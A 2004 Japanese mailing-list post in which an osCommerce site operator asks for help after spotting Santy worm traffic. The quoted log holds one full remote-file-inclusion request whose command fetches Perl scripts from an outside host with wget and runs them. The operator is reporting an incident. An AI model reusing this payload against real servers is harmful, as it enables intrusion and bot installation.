kushima michio
michiok_mac****@mac*****
2004年 12月 27日 (月) 10:20:37 JST
すみません。 これ、いま話題の、santy worm でしたね。 感染はしていないようだけど、この汚くなったログを、 どうすればいいんだろうか...。 On 2004.12.26, at 12:33, kushima michio <michiok_mac****@mac*****> wrote: > >michio です。 > >昨日から、異常にアクセスが増えて、調べてみたところ、 >以下のように、OSCで利用するPHPへのアクセスに対して、 >何か不正を働こうとしているようです。 > > >67.19.230.106 - - [26/Dec/2004:04:02:06 +0900] "GET /information.php?tpl=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt HTTP/1.1" 200 31573 "-" "LWP::Simple/5.800" > > >何か、聞くところを間違えてる気もしますが、今まで、経験が無く、 >放置していいものか悩みまして、書き込みしてみました。 > >PHPのバージョンによっては、まずいとかそういう話なんだとは思いますが、 >検索では引っかかってこなかったので、もし何か情報あれば、お教えいただけないかとおもい、 >書き込んでみました。 > >-------------- >michio > > >_______________________________________________ >Tep-j-general mailing list >Tep-j****@lists***** >http://lists.sourceforge.jp/mailman/listinfo/tep-j-general > >
